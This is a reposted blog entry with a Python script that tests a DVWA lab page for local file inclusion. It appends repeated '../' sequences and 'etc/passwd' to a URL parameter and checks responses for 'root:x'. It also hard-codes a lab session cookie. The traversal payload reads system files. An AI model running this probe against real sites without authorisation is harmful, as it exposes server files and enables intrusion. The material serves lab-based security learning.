
文件包含漏洞自动化测试代码

作者:互联网

import requests
import sys
import termcolor
"""
以DVWA Web应用为目标进行测试,选择其含有文件包含漏洞的页面
Target URL:  http://192.168.140.137/dvwa/vulnerabilities/fi/?page=
"""
def banner():
    """Print the tool's start-up banner and the expected target URL format."""
    # A separate local name avoids shadowing the function's own name.
    banner_text = """
            ******************************************************************
            ******************************************************************
                            File Inclusion Test Tool by Jason Wong V1.0
            ******************************************************************
            ******************************************************************
            Warning:Your target URL should be like http://example.com/index.php?file=

        """
    print(banner_text)

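def main():
    """Probe one URL parameter of a lab target for local file inclusion.

    Prompts for a target URL that ends in the parameter under test (for
    example ``...?page=``), appends one to nine ``../`` segments followed by
    ``etc/passwd`` and requests each candidate in turn. The loop stops at
    the first response that contains ``root:x``.

    The match on ``root:x`` is a heuristic. A page that merely echoes the
    requested path, or unrelated content containing that string, also
    matches, so confirm a hit by reading the response by hand.

    Exits the process on Ctrl-C, and with status 1 when a request fails.
    """
    banner()
    target_url = input("Enter target url to test: ")
    payloads = 'etc/passwd'
    # NOTE(review): this session cookie is hard-coded for the DVWA lab
    # instance named in the module docstring. A session identifier is a
    # credential: it expires, it is specific to one login, and it should not
    # be published with the source. Prefer reading it from the environment
    # or a prompt when adapting this script.
    cookies = {
        "PHPSESSID": "da096185e02e1ee5b6edf69fdc83c855",
        "security": "low",
    }
    # requests has no default timeout; without one, an unresponsive host
    # blocks the script indefinitely.
    request_timeout = 10
    detect_flag = False
    print('\nTest results: \n\n')
    try:
        for i in range(1, 10):
            url = target_url + "../" * i + payloads
            response = requests.get(
                url=url, cookies=cookies, timeout=request_timeout
            ).text
            if 'root:x' in response:
                print(url, '\n')
                print(termcolor.colored("\tFile Including Vulnerability Found!", 'blue'))
                detect_flag = True
                break
    except KeyboardInterrupt:
        print("Exit the program")
        sys.exit()
    except requests.RequestException as err:
        # Connection errors, timeouts and malformed URLs end up here; report
        # them instead of letting a traceback look like a "not vulnerable" run.
        print(f"Request failed: {err}")
        sys.exit(1)

    if not detect_flag:
        print("No File Inclusion Vulnerability Found!")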

# Run the interactive test only when executed as a script, so importing this
# module does not prompt for input or send requests.
if __name__ == "__main__":
    main()

 

来源: https://www.cnblogs.com/jason-huawen/p/16219390.html